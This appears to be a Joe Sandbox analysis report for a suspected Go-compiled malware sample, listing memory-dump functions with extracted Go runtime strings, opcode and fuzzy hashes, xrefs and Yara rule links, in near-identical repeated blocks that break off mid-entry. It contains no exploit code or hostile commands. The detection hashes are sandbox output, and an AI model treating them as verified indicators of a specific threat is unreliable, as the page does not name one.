String ID: because dotdotdotGC worker (active)bad lfnode addressbad manualFreeListchunk out of ordercleantimers: bad pcompression methoddimension overflowelem align too bigforEachP: not donegarbage collectionindex out of rangeruntime.semacreateruntime.semawakeupstopping$ to finalizer GC (dedicated)GC assist waitGC worker initbad allocCountbad restart PCbad span statefinalizer waitkey size wrongnil elem type!no module datanot a PNG fileread mem statssemaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.WaituserAren$, not a function0123456789ABCDEF0123456789abcdefGC scavenge waitGC worker (idle)GODEBUG: value "$runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]trace: non-empty full trace bufferattempt to clear non-empty span setfindrunnable: netpoll$runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeToNearestEvenToNearestAwayToZeroAwayFromZeroToNegativeInfToPositiveInfcannot convert slice with length %y to array or pointer to a$runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)acquireSudog: found s.elem != nil in cachefatal error: cgo callback before cgo callnon-empty ma
API String ID: 0-4243375483
Opcode ID: 9b6b74f5a8b176e78e8f5bacd242e800aa63ca542ff239332236412029ab78e2
Instruction ID: a2d1aec9f881dd462de0084832bff0393daabe4bf820deaa05974317d47f2d3d
Opcode Fuzzy Hash: 9b6b74f5a8b176e78e8f5bacd242e800aa63ca542ff239332236412029ab78e2
Instruction Fuzzy Hash: 8D516471689AC491E666AF91EC887DFA7A5F748B80F494432FA4C53FA7EF38C4058344

Function 000002EBF9BA795D Relevance: 7.6, Strings: 6, Instructions: 106COMMON

Download Yara Rule

Strings

runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)acquireSudog: found s.elem != nil in cachefatal error: cgo callback before cgo callnon-empty ma, xrefs: 000002EBF9BA7CAC
to finalizer GC (dedicated)GC assist waitGC worker initbad allocCountbad restart PCbad span statefinalizer waitkey size wrongnil elem type!no module datanot a PNG fileread mem statssemaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.WaituserAren, xrefs: 000002EBF9BA7BA1, 000002EBF9BA7BF8, 000002EBF9BA7C62
runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeToNearestEvenToNearestAwayToZeroAwayFromZeroToNegativeInfToPositiveInfcannot convert slice with length %y to array or pointer to a, xrefs: 000002EBF9BA7CBD
runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]trace: non-empty full trace bufferattempt to clear non-empty span setfindrunnable: netpoll, xrefs: 000002EBF9BA7BB6, 000002EBF9BA7C0D, 000002EBF9BA7C77
because dotdotdotGC worker (active)bad lfnode addressbad manualFreeListchunk out of ordercleantimers: bad pcompression methoddimension overflowelem align too bigforEachP: not donegarbage collectionindex out of rangeruntime.semacreateruntime.semawakeupstopping, xrefs: 000002EBF9BA7C3C
, not a function0123456789ABCDEF0123456789abcdefGC scavenge waitGC worker (idle)GODEBUG: value ", xrefs: 000002EBF9BA7C9D

Memory Dump Source

Source File: 00000000.00000002.4572444295.000002EBF9B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002EBF9B90000, based on PE: true

Associated: 00000000.00000002.4572444295.000002EBFA590000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA7FC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA869000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA898000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE2C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE33000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE5A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE61000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ebf9b90000_O16AWEA5iQ.jbxd

Similarity

API ID:
String ID: because dotdotdotGC worker (active)bad lfnode addressbad manualFreeListchunk out of ordercleantimers: bad pcompression methoddimension overflowelem align too bigforEachP: not donegarbage collectionindex out of rangeruntime.semacreateruntime.semawakeupstopping$ to finalizer GC (dedicated)GC assist waitGC worker initbad allocCountbad restart PCbad span statefinalizer waitkey size wrongnil elem type!no module datanot a PNG fileread mem statssemaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.WaituserAren$, not a function0123456789ABCDEF0123456789abcdefGC scavenge waitGC worker (idle)GODEBUG: value "$runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]trace: non-empty full trace bufferattempt to clear non-empty span setfindrunnable: netpoll$runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeToNearestEvenToNearestAwayToZeroAwayFromZeroToNegativeInfToPositiveInfcannot convert slice with length %y to array or pointer to a$runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)acquireSudog: found s.elem != nil in cachefatal error: cgo callback before cgo callnon-empty ma
API String ID: 0-4243375483
Opcode ID: c2dfc05885c33c5d0a7a03473c5bb34f451e612d4c4f7097d7117c9c4a43ca64
Instruction ID: 5e1577237f7d57a45b364a34bfd55f340cb8e2cfa81458582ace817a283ff141
Opcode Fuzzy Hash: c2dfc05885c33c5d0a7a03473c5bb34f451e612d4c4f7097d7117c9c4a43ca64
Instruction Fuzzy Hash: E95173716896C491E666AF91EC887DFA7A5F748B80F494432FA4853FA6EF38C4018344

Function 000002EBF9BA7957 Relevance: 7.6, Strings: 6, Instructions: 106COMMON

Download Yara Rule

Strings

runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)acquireSudog: found s.elem != nil in cachefatal error: cgo callback before cgo callnon-empty ma, xrefs: 000002EBF9BA7CAC
to finalizer GC (dedicated)GC assist waitGC worker initbad allocCountbad restart PCbad span statefinalizer waitkey size wrongnil elem type!no module datanot a PNG fileread mem statssemaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.WaituserAren, xrefs: 000002EBF9BA7BA1, 000002EBF9BA7BF8, 000002EBF9BA7C62
runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeToNearestEvenToNearestAwayToZeroAwayFromZeroToNegativeInfToPositiveInfcannot convert slice with length %y to array or pointer to a, xrefs: 000002EBF9BA7CBD
runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]trace: non-empty full trace bufferattempt to clear non-empty span setfindrunnable: netpoll, xrefs: 000002EBF9BA7BB6, 000002EBF9BA7C0D, 000002EBF9BA7C77
because dotdotdotGC worker (active)bad lfnode addressbad manualFreeListchunk out of ordercleantimers: bad pcompression methoddimension overflowelem align too bigforEachP: not donegarbage collectionindex out of rangeruntime.semacreateruntime.semawakeupstopping, xrefs: 000002EBF9BA7C3C
, not a function0123456789ABCDEF0123456789abcdefGC scavenge waitGC worker (idle)GODEBUG: value ", xrefs: 000002EBF9BA7C9D

Memory Dump Source

Source File: 00000000.00000002.4572444295.000002EBF9B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002EBF9B90000, based on PE: true

Associated: 00000000.00000002.4572444295.000002EBFA590000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA7FC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA869000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA898000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE2C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE33000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE5A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE61000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ebf9b90000_O16AWEA5iQ.jbxd

Similarity

API ID:
String ID: because dotdotdotGC worker (active)bad lfnode addressbad manualFreeListchunk out of ordercleantimers: bad pcompression methoddimension overflowelem align too bigforEachP: not donegarbage collectionindex out of rangeruntime.semacreateruntime.semawakeupstopping$ to finalizer GC (dedicated)GC assist waitGC worker initbad allocCountbad restart PCbad span statefinalizer waitkey size wrongnil elem type!no module datanot a PNG fileread mem statssemaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.WaituserAren$, not a function0123456789ABCDEF0123456789abcdefGC scavenge waitGC worker (idle)GODEBUG: value "$runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]trace: non-empty full trace bufferattempt to clear non-empty span setfindrunnable: netpoll$runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeToNearestEvenToNearestAwayToZeroAwayFromZeroToNegativeInfToPositiveInfcannot convert slice with length %y to array or pointer to a$runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)acquireSudog: found s.elem != nil in cachefatal error: cgo callback before cgo callnon-empty ma
API String ID: 0-4243375483
Opcode ID: c2dfc05885c33c5d0a7a03473c5bb34f451e612d4c4f7097d7117c9c4a43ca64
Instruction ID: 5e1577237f7d57a45b364a34bfd55f340cb8e2cfa81458582ace817a283ff141
Opcode Fuzzy Hash: c2dfc05885c33c5d0a7a03473c5bb34f451e612d4c4f7097d7117c9c4a43ca64
Instruction Fuzzy Hash: E95173716896C491E666AF91EC887DFA7A5F748B80F494432FA4853FA6EF38C4018344

Function 000002EBF9BA794B Relevance: 7.6, Strings: 6, Instructions: 106COMMON

Download Yara Rule

Strings

runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)acquireSudog: found s.elem != nil in cachefatal error: cgo callback before cgo callnon-empty ma, xrefs: 000002EBF9BA7CAC
to finalizer GC (dedicated)GC assist waitGC worker initbad allocCountbad restart PCbad span statefinalizer waitkey size wrongnil elem type!no module datanot a PNG fileread mem statssemaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.WaituserAren, xrefs: 000002EBF9BA7BA1, 000002EBF9BA7BF8, 000002EBF9BA7C62
runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeToNearestEvenToNearestAwayToZeroAwayFromZeroToNegativeInfToPositiveInfcannot convert slice with length %y to array or pointer to a, xrefs: 000002EBF9BA7CBD
runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]trace: non-empty full trace bufferattempt to clear non-empty span setfindrunnable: netpoll, xrefs: 000002EBF9BA7BB6, 000002EBF9BA7C0D, 000002EBF9BA7C77
because dotdotdotGC worker (active)bad lfnode addressbad manualFreeListchunk out of ordercleantimers: bad pcompression methoddimension overflowelem align too bigforEachP: not donegarbage collectionindex out of rangeruntime.semacreateruntime.semawakeupstopping, xrefs: 000002EBF9BA7C3C
, not a function0123456789ABCDEF0123456789abcdefGC scavenge waitGC worker (idle)GODEBUG: value ", xrefs: 000002EBF9BA7C9D

Memory Dump Source

Source File: 00000000.00000002.4572444295.000002EBF9B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002EBF9B90000, based on PE: true

Associated: 00000000.00000002.4572444295.000002EBFA590000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA7FC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA869000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA898000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE2C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE33000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE5A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE61000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ebf9b90000_O16AWEA5iQ.jbxd

Similarity

API ID:
String ID: because dotdotdotGC worker (active)bad lfnode addressbad manualFreeListchunk out of ordercleantimers: bad pcompression methoddimension overflowelem align too bigforEachP: not donegarbage collectionindex out of rangeruntime.semacreateruntime.semawakeupstopping$ to finalizer GC (dedicated)GC assist waitGC worker initbad allocCountbad restart PCbad span statefinalizer waitkey size wrongnil elem type!no module datanot a PNG fileread mem statssemaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.WaituserAren$, not a function0123456789ABCDEF0123456789abcdefGC scavenge waitGC worker (idle)GODEBUG: value "$runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]trace: non-empty full trace bufferattempt to clear non-empty span setfindrunnable: netpoll$runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeToNearestEvenToNearestAwayToZeroAwayFromZeroToNegativeInfToPositiveInfcannot convert slice with length %y to array or pointer to a$runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)acquireSudog: found s.elem != nil in cachefatal error: cgo callback before cgo callnon-empty ma
API String ID: 0-4243375483
Opcode ID: 9b6b74f5a8b176e78e8f5bacd242e800aa63ca542ff239332236412029ab78e2
Instruction ID: a2d1aec9f881dd462de0084832bff0393daabe4bf820deaa05974317d47f2d3d
Opcode Fuzzy Hash: 9b6b74f5a8b176e78e8f5bacd242e800aa63ca542ff239332236412029ab78e2
Instruction Fuzzy Hash: 8D516471689AC491E666AF91EC887DFA7A5F748B80F494432FA4C53FA7EF38C4058344

Function 000002EBF9BA7951 Relevance: 7.6, Strings: 6, Instructions: 106COMMON

Download Yara Rule

Strings

runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)acquireSudog: found s.elem != nil in cachefatal error: cgo callback before cgo callnon-empty ma, xrefs: 000002EBF9BA7CAC
to finalizer GC (dedicated)GC assist waitGC worker initbad allocCountbad restart PCbad span statefinalizer waitkey size wrongnil elem type!no module datanot a PNG fileread mem statssemaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.WaituserAren, xrefs: 000002EBF9BA7BA1, 000002EBF9BA7BF8, 000002EBF9BA7C62
runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeToNearestEvenToNearestAwayToZeroAwayFromZeroToNegativeInfToPositiveInfcannot convert slice with length %y to array or pointer to a, xrefs: 000002EBF9BA7CBD
runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]trace: non-empty full trace bufferattempt to clear non-empty span setfindrunnable: netpoll, xrefs: 000002EBF9BA7BB6, 000002EBF9BA7C0D, 000002EBF9BA7C77
because dotdotdotGC worker (active)bad lfnode addressbad manualFreeListchunk out of ordercleantimers: bad pcompression methoddimension overflowelem align too bigforEachP: not donegarbage collectionindex out of rangeruntime.semacreateruntime.semawakeupstopping, xrefs: 000002EBF9BA7C3C
, not a function0123456789ABCDEF0123456789abcdefGC scavenge waitGC worker (idle)GODEBUG: value ", xrefs: 000002EBF9BA7C9D

Memory Dump Source

Source File: 00000000.00000002.4572444295.000002EBF9B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002EBF9B90000, based on PE: true

Associated: 00000000.00000002.4572444295.000002EBFA590000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA7FC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA869000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA898000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE2C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE33000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE5A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE61000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ebf9b90000_O16AWEA5iQ.jbxd

Similarity

API ID:
String ID: because dotdotdotGC worker (active)bad lfnode addressbad manualFreeListchunk out of ordercleantimers: bad pcompression methoddimension overflowelem align too bigforEachP: not donegarbage collectionindex out of rangeruntime.semacreateruntime.semawakeupstopping$ to finalizer GC (dedicated)GC assist waitGC worker initbad allocCountbad restart PCbad span statefinalizer waitkey size wrongnil elem type!no module datanot a PNG fileread mem statssemaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.WaituserAren$, not a function0123456789ABCDEF0123456789abcdefGC scavenge waitGC worker (idle)GODEBUG: value "$runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]trace: non-empty full trace bufferattempt to clear non-empty span setfindrunnable: netpoll$runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeToNearestEvenToNearestAwayToZeroAwayFromZeroToNegativeInfToPositiveInfcannot convert slice with length %y to array or pointer to a$runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)acquireSudog: found s.elem != nil in cachefatal error: cgo callback before cgo callnon-empty ma
API String ID: 0-4243375483
Opcode ID: 844a83c704b10319fd04ccf7ad8f8f66cf51ed1f07bf980d1537ae3d5d7061c0
Instruction ID: f0146bc3a9a2806ff7829a55bed4c09a18f231662ab9ed4a32070bbaa2880970
Opcode Fuzzy Hash: 844a83c704b10319fd04ccf7ad8f8f66cf51ed1f07bf980d1537ae3d5d7061c0
Instruction Fuzzy Hash: CE517371689AC491E666AF91EC887DFA7A5F748B80F494432FA4853FA6EF38C4018344

Function 000002EBF9BAC760 Relevance: 5.3, Strings: 4, Instructions: 314COMMON

Download Yara Rule

Strings

can't scan our own stackdouble traceGCSweepStartgcDrainN phase incorrecthash of unhashable type invalid interlace methodpageAlloc: out of memoryqueuefinalizer during GCrange partially overlapsrunqsteal: runq overflowspan has no free objectsupdate during transi, xrefs: 000002EBF9BACC85
scanstack: goroutine not stoppedscavenger state is already wiredslice bounds out of range [%x::]slice bounds out of range [:%x:]slice bounds out of range [::%x]sweep increased allocation countGODEBUG: no value specified for "concurrent map read and map writefi, xrefs: 000002EBF9BACCA7
mark - bad statusmarkBits overflowmissing closing )missing closing ]notetsleepg on g0runtime.newosprocruntime/internal/scanobject n == 0select (no cases)swept cached spansync.RWMutex.Lockthread exhaustionunknown caller pcwait for GC cycle because dotdotdotGC w, xrefs: 000002EBF9BAC964
scanstack - bad statussend on closed channelspan has no free spacestack not a power of 2trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p state", missing CPU supportchan receive (nil chan)close of closed channelfailed to verif, xrefs: 000002EBF9BACCC0

Memory Dump Source

Source File: 00000000.00000002.4572444295.000002EBF9B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002EBF9B90000, based on PE: true

Associated: 00000000.00000002.4572444295.000002EBFA590000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA7FC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA869000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA898000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE2C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE33000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE5A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE61000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ebf9b90000_O16AWEA5iQ.jbxd

Similarity

API ID:
String ID: can't scan our own stackdouble traceGCSweepStartgcDrainN phase incorrecthash of unhashable type invalid interlace methodpageAlloc: out of memoryqueuefinalizer during GCrange partially overlapsrunqsteal: runq overflowspan has no free objectsupdate during transi$mark - bad statusmarkBits overflowmissing closing )missing closing ]notetsleepg on g0runtime.newosprocruntime/internal/scanobject n == 0select (no cases)swept cached spansync.RWMutex.Lockthread exhaustionunknown caller pcwait for GC cycle because dotdotdotGC w$scanstack - bad statussend on closed channelspan has no free spacestack not a power of 2trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p state", missing CPU supportchan receive (nil chan)close of closed channelfailed to verif$scanstack: goroutine not stoppedscavenger state is already wiredslice bounds out of range [%x::]slice bounds out of range [:%x:]slice bounds out of range [::%x]sweep increased allocation countGODEBUG: no value specified for "concurrent map read and map writefi
API String ID: 0-1939307652
Opcode ID: 2e465640622f0b8b24ab076d6a37d981556ad287fa2df453a46b00ff3b6c314e
Instruction ID: 53ce1ee2773f239f8ff9a0cd2702fa35ab953ef874d916d9dcc940db41465089
Opcode Fuzzy Hash: 2e465640622f0b8b24ab076d6a37d981556ad287fa2df453a46b00ff3b6c314e
Instruction Fuzzy Hash: BEE13E32689BC485EB6A8F55E8487EFA7A1F789B84F545026EE4C13F9ADF38C444C740

Function 000002EBF9BA9BA0 Relevance: 5.2, Strings: 4, Instructions: 198COMMON

Download Yara Rule

Strings

work.nwait was > work.nprocFixedStack is not power-of-2comparing uncomparable type fatal: morestack on gsignalfindrunnable: netpoll with pfound pointer to free objectgcBgMarkWorker: mode not setgcstopm: negative nmspinninginvalid runtime symbol tablemissing s, xrefs: 000002EBF9BA9EFB
GC worker initbad allocCountbad restart PCbad span statefinalizer waitkey size wrongnil elem type!no module datanot a PNG fileread mem statssemaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.WaituserArenaStatework.full != 0BelowExactAboveGC (fra, xrefs: 000002EBF9BA9BD5, 000002EBF9BA9BEC
gcBgMarkWorker: blackening not enabledindex out of range [%x] with length %yinternal error: exit hook invoked exitm changed unexpectedly in cgocallbackgmakechan: invalid channel element typeruntime: blocked read on free polldescruntime: sudog with non-false is, xrefs: 000002EBF9BA9F20
work.nwait > work.nproc000000000011111111112222012345678901234567890123bad defer entry in panicbypassed recovery failedcan't scan our own stackdouble traceGCSweepStartgcDrainN phase incorrecthash of unhashable type invalid interlace methodpageAlloc: out of mem, xrefs: 000002EBF9BA9EEA

Memory Dump Source

Source File: 00000000.00000002.4572444295.000002EBF9B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002EBF9B90000, based on PE: true

Associated: 00000000.00000002.4572444295.000002EBFA590000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA7FC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA869000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA898000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE2C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE33000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE5A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE61000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ebf9b90000_O16AWEA5iQ.jbxd

Similarity

API ID:
String ID: GC worker initbad allocCountbad restart PCbad span statefinalizer waitkey size wrongnil elem type!no module datanot a PNG fileread mem statssemaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.WaituserArenaStatework.full != 0BelowExactAboveGC (fra$gcBgMarkWorker: blackening not enabledindex out of range [%x] with length %yinternal error: exit hook invoked exitm changed unexpectedly in cgocallbackgmakechan: invalid channel element typeruntime: blocked read on free polldescruntime: sudog with non-false is$work.nwait > work.nproc000000000011111111112222012345678901234567890123bad defer entry in panicbypassed recovery failedcan't scan our own stackdouble traceGCSweepStartgcDrainN phase incorrecthash of unhashable type invalid interlace methodpageAlloc: out of mem$work.nwait was > work.nprocFixedStack is not power-of-2comparing uncomparable type fatal: morestack on gsignalfindrunnable: netpoll with pfound pointer to free objectgcBgMarkWorker: mode not setgcstopm: negative nmspinninginvalid runtime symbol tablemissing s
API String ID: 0-2777362568
Opcode ID: 5080eb13ed797dbc30d33664345b2fd4e358c1c4726879a9353516cef891fc9d
Instruction ID: bc1783e08e5f41344fe1c7843e3a215949ffd1d44a3f73d21e839ea8ed202d65
Opcode Fuzzy Hash: 5080eb13ed797dbc30d33664345b2fd4e358c1c4726879a9353516cef891fc9d
Instruction Fuzzy Hash: 92A1A132284BC585EB4ACB55F88839BB3A5F34AB90F205126FF5883BA6DF39C455C740

Function 000002EBF9BD8440 Relevance: 5.2, Strings: 4, Instructions: 180COMMON

Download Yara Rule

Strings

